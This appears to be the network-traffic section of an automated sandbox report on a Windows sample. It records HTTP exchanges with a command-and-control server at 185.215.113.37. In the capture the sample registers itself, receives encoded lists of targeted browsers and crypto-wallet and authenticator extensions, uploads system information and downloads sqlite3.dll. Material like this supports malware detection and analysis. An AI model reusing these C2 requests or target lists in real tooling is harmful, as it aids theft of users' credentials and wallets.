Sep 30, 2024 07:08:13.697689056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:13.726557970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:13.731436014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:14.444073915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:14.444135904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:14.447156906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:14.452020884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:14.678656101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:14.678667068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:14.678678036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:14.678755045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:14.680372000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:14.685180902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:15.399600029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:15.399687052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:20.404616117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 30, 2024 07:08:20.405824900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 30, 2024 07:08:20.798269033 CEST	49730	80	192.168.2.4	185.215.113.37

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.215.113.37	80	3852	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 07:07:57.912667990 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 30, 2024 07:07:58.612293959 CEST	203	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:07:58 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:07:58.614895105 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBAEGCGCGIEGDHIDHJJE Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 36 36 31 38 30 33 42 32 46 32 34 32 30 33 32 35 35 37 35 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 2d 2d 0d 0a Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="hwid"4D2661803B2F2420325575------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="build"doma------DBAEGCGCGIEGDHIDHJJE--
Sep 30, 2024 07:07:58.855408907 CEST	407	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:07:58 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4e 54 46 6a 4e 54 55 77 59 7a 64 6c 4e 7a 46 68 4d 7a 42 68 4d 7a 51 77 59 57 4a 68 4f 57 55 35 59 6d 52 6d 4e 57 4a 68 4e 32 45 77 59 57 4d 79 59 57 45 77 4d 44 68 69 4f 54 4d 77 4e 44 63 78 4d 7a 51 30 4e 7a 4e 6a 4e 32 56 6d 5a 44 63 33 4d 7a 5a 6d 4e 6a 4e 6a 4f 47 5a 6d 4e 54 46 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: NTFjNTUwYzdlNzFhMzBhMzQwYWJhOWU5YmRmNWJhN2EwYWMyYWEwMDhiOTMwNDcxMzQ0NzNjN2VmZDc3MzZmNjNjOGZmNTFifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Sep 30, 2024 07:07:58.856631041 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIDGDAKFHIEHJKFHDHD Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 44 47 44 41 4b 46 48 49 45 48 4a 4b 46 48 44 48 44 2d 2d 0d 0a Data Ascii: ------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------BFIDGDAKFHIEHJKFHDHDContent-Disposition: form-data; name="message"browsers------BFIDGDAKFHIEHJKFHDHD--
Sep 30, 2024 07:07:59.080764055 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:07:58 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Sep 30, 2024 07:07:59.080890894 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Sep 30, 2024 07:07:59.082160950 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"plugins------EHIIIJDAAAAAAKECBFBA--
Sep 30, 2024 07:07:59.306684971 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:07:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Sep 30, 2024 07:07:59.306700945 CEST	224	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdk
Sep 30, 2024 07:07:59.306713104 CEST	1236	IN	Data Raw: 62 32 4e 74 59 32 4a 74 5a 6d 6c 72 5a 47 4e 76 5a 32 39 6d 63 47 68 70 62 57 35 72 62 6d 39 38 4d 58 77 77 66 44 42 38 51 58 56 79 62 79 42 58 59 57 78 73 5a 58 51 6f 54 57 6c 75 59 53 42 51 63 6d 39 30 62 32 4e 76 62 43 6c 38 59 32 35 74 59 57 Data Ascii: b2NtY2JtZmlrZGNvZ29mcGhpbW5rbm98MXwwfDB8QXVybyBXYWxsZXQoTWluYSBQcm90b2NvbCl8Y25tYW1hYWNocHBua2pnbmlsZHBkbWthYWtlam5oYWV8MXwwfDB8UG9seW1lc2ggV2FsbGV0fGpvamhmZW9lZGtwa2dsYmZpbWRmYWJwZGZqYW9vbGFmfDF8MHwwfElDT05leHxmbHBpY2lpbGVtZ2hibWZhbGljYWpvb2x
Sep 30, 2024 07:07:59.306807995 CEST	1236	IN	Data Raw: 5a 32 52 74 62 57 74 72 5a 6d 70 68 59 6d 5a 6d 5a 57 64 68 62 6d 6c 6c 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d Data Ascii: Z2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamt
Sep 30, 2024 07:07:59.306818008 CEST	148	IN	Data Raw: 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 Data Ascii: fDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpv
Sep 30, 2024 07:07:59.306823969 CEST	1236	IN	Data Raw: 63 69 42 51 59 58 4e 7a 64 32 39 79 5a 43 42 4e 59 57 35 68 5a 32 56 79 66 47 6c 74 62 47 39 70 5a 6d 74 6e 61 6d 46 6e 5a 32 68 75 62 6d 4e 71 61 32 68 6e 5a 32 52 6f 59 57 78 74 59 32 35 6d 61 32 78 72 66 44 46 38 4d 48 77 77 66 45 46 31 64 47 Data Ascii: ciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGhpZ29vb2FkZGlucGtiYWl8MXwwfDB8QXV0aHl8Z2FlZG1qZGZtbWFoaGJqZWZjYmdhb2xoaGFubGFvbGJ8MXwwfDB8RU9TIEF1dGhlbnRpY2F0b3J8b2VsamRsZHB
Sep 30, 2024 07:07:59.306834936 CEST	224	IN	Data Raw: 61 47 52 6a 62 32 35 6b 59 6d 4e 69 5a 47 35 69 5a 57 56 77 63 47 64 6b 63 47 68 38 4d 58 77 77 66 44 42 38 55 6d 6c 7a 5a 53 41 74 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 6f 59 6d 4a 6e 59 6d 56 77 61 47 64 76 61 6d 6c 72 59 57 Data Ascii: aGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWluYm93IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNj
Sep 30, 2024 07:07:59.306972027 CEST	1236	IN	Data Raw: 59 57 39 70 59 32 39 6c 61 6d 39 75 61 57 46 74 62 57 35 68 62 47 74 6d 59 58 77 78 66 44 42 38 4d 48 78 46 59 33 52 76 49 46 64 68 62 47 78 6c 64 48 78 69 5a 32 70 76 5a 33 42 76 61 57 52 6c 61 6d 52 6c 62 57 64 76 62 32 4e 6f 63 47 35 72 62 57 Data Ascii: YW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXw
Sep 30, 2024 07:07:59.306983948 CEST	568	IN	Data Raw: 61 79 42 58 59 57 78 73 5a 58 52 38 59 57 5a 73 61 32 31 6d 61 47 56 69 5a 57 52 69 61 6d 6c 76 61 58 42 6e 62 47 64 6a 59 6d 4e 74 62 6d 4a 77 5a 32 78 70 62 32 5a 38 4d 58 77 77 66 44 42 38 56 47 39 75 61 32 56 6c 63 47 56 79 49 46 64 68 62 47 Data Ascii: ayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJ
Sep 30, 2024 07:07:59.308777094 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIEBAKEHDHCAKEBFBKEG Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 63 37 65 37 31 61 33 30 61 33 34 30 61 62 61 39 65 39 62 64 66 35 62 61 37 61 30 61 63 32 61 61 30 30 38 62 39 33 30 34 37 31 33 34 34 37 33 63 37 65 66 64 37 37 33 36 66 36 33 63 38 66 66 35 31 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 45 42 41 4b 45 48 44 48 43 41 4b 45 42 46 42 4b 45 47 2d 2d 0d 0a Data Ascii: ------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------HIEBAKEHDHCAKEBFBKEGContent-Disposition: form-data; name="message"fplugins------HIEBAKEHDHCAKEBFBKEG--
Sep 30, 2024 07:07:59.533128977 CEST	335	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:07:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Sep 30, 2024 07:07:59.668359995 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBA Host: 185.215.113.37 Content-Length: 6155 Connection: Keep-Alive Cache-Control: no-cache
Sep 30, 2024 07:07:59.668411970 CEST	6155	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 31 63 35 35 30 Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="token"51c550c7e71a30a340aba9e9bdf5ba7a0ac2aa008b93047134473c7efd7736f63c8ff51b------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Sep 30, 2024 07:08:00.407778025 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:07:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 30, 2024 07:08:00.671452999 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Sep 30, 2024 07:08:00.892748117 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 05:08:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 